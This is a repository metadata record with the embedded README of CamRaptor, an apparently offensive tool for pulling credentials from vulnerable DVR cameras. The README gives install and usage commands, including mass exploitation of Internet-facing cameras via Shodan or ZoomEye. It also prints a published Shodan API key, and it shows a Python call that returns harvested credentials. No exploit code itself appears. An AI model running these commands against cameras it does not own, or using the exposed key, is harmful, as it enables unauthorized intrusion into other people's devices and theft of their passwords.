{"id":21845249,"url":"https://github.com/entysec/camraptor","last_synced_at":"2025-04-09T19:20:01.751Z","repository":{"id":49277126,"uuid":"372938950","full_name":"EntySec/CamRaptor","owner":"EntySec","description":"CamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain network camera credentials.","archived":false,"fork":false,"pushed_at":"2024-07-17T23:07:58.000Z","size":117,"stargazers_count":220,"open_issues_count":1,"forks_count":33,"subscribers_count":6,"default_branch":"main","last_synced_at":"2025-04-09T19:19:57.785Z","etag":null,"topics":["camera","camera-hacking","entysec","exploit","iot","kalilinux","payload"],"latest_commit_sha":null,"homepage":"https://entysec.com","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/EntySec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null},"funding":{"github":"entysec"}},"created_at":"2021-06-01T19:22:03.000Z","updated_at":"2025-04-04T03:18:17.000Z","dependencies_parsed_at":"2024-07-18T02:05:57.477Z","dependency_job_id":null,"html_url":"https://github.com/EntySec/CamRaptor","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EntySec%2FCamRaptor","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EntySec%2FCamRaptor/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EntySec%2FCamRaptor/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/EntySec%2FCamRaptor/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/EntySec","download_url":"https://codeload.github.com/EntySec/CamRaptor/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248094991,"owners_count":21046770,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["camera","camera-hacking","entysec","exploit","iot","kalilinux","payload"],"created_at":"2024-11-27T23:08:45.528Z","updated_at":"2025-04-09T19:20:01.722Z","avatar_url":"https://github.com/EntySec.png","language":"Python","funding_links":["https://github.com/sponsors/entysec"],"categories":[],"sub_categories":[],"readme":"# CamRaptor\n\n[![Developer](https://img.shields.io/badge/developer-EntySec-blue.svg)](https://entysec.com)\n[![Language](https://img.shields.io/badge/language-Python-blue.svg)](https://github.com/EntySec/CamRaptor)\n[![Forks](https://img.shields.io/github/forks/EntySec/CamRaptor?style=flat\u0026color=green)](https://github.com/EntySec/CamRaptor/forks)\n[![Stars](https://img.shields.io/github/stars/EntySec/CamRaptor?style=flat\u0026color=yellow)](https://github.com/EntySec/CamRaptor/stargazers)\n[![CodeFactor](https://www.codefactor.io/repository/github/EntySec/CamRaptor/badge)](https://www.codefactor.io/repository/github/EntySec/CamRaptor)\n\nCamRaptor is a tool that exploits several vulnerabilities in popular DVR cameras to obtain network camera credentials.\n\n## Features\n\n* Exploits vulnerabilities in most popular camera models such as `Novo`, `CeNova` and `QSee`.\n* Optimized to exploit multiple cameras at one time from list with threading enabled.\n* Simple CLI and API usage.\n\n## Installation\n\n```shell\npip3 install git+https://github.com/EntySec/CamRaptor\n```\n\n## Basic usage\n\nTo use CamRaptor just type `camraptor` in your terminal.\n\n```\nusage: camraptor [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS]\n                 [--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]\n\nCamRaptor is a tool that exploits several vulnerabilities in popular DVR\ncameras to obtain network camera credentials.\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -t, --threads         Use threads for fastest work.\n  -o OUTPUT, --output OUTPUT\n                        Output result to file.\n  -i INPUT, --input INPUT\n                        Input file of addresses.\n  -a ADDRESS, --address ADDRESS\n                        Single address.\n  --shodan SHODAN       Shodan API key for exploiting devices over Internet.\n  --zoomeye ZOOMEYE     ZoomEye API key for exploiting devices over Internet.\n  -p PAGES, --pages PAGES\n                        Number of pages you want to get from ZoomEye.\n```\n\n### Examples\n\n**Exploiting single camera**\n\nLet's hack my camera just for fun.\n\n```shell\ncamraptor -a 192.168.99.100\n```\n\n**Exploiting cameras from Internet**\n\nLet's try to use Shodan search engine to exploit cameras over Internet, we will use it with `-t` for fast exploitation.\n\n```shell\ncamraptor -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD\n```\n\n**NOTE:** Given Shodan API key (`PSKINdQe1GyxGgecYz2191H2JoS9qvgD`) is my PRO API key, you can use this key or your own, be free to use all our resources for free :)\n\n**Exploiting cameras from input file**\n\nLet's try to use opened database of cameras with `-t` for fast exploitation.\n\n```shell\ncamraptor -t -i cameras.txt -o passwords.txt\n```\n\n**NOTE:** It will exploit all cameras in `cameras.txt` list by their addresses and save all obtained passwords to `passwords.txt`.\n\n## API usage\n\nCamRaptor also has their own Python API that can be invoked by importing CamRaptor to your code.\n\n```python\nfrom camraptor import CamRaptor\n```\n\n### Basic functions\n\nThere are all CamRaptor basic functions that can be used to exploit specified camera.\n\n* `exploit(address)` - Exploit single camera by given address.\n\n### Examples\n\n**Exploiting single camera**\n\n```python\nfrom camraptor import CamRaptor\n\ncamraptor = CamRaptor()\ncreds = camraptor.exploit('192.168.99.100')\n\nprint(creds)\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fentysec%2Fcamraptor","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fentysec%2Fcamraptor","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fentysec%2Fcamraptor/lists"}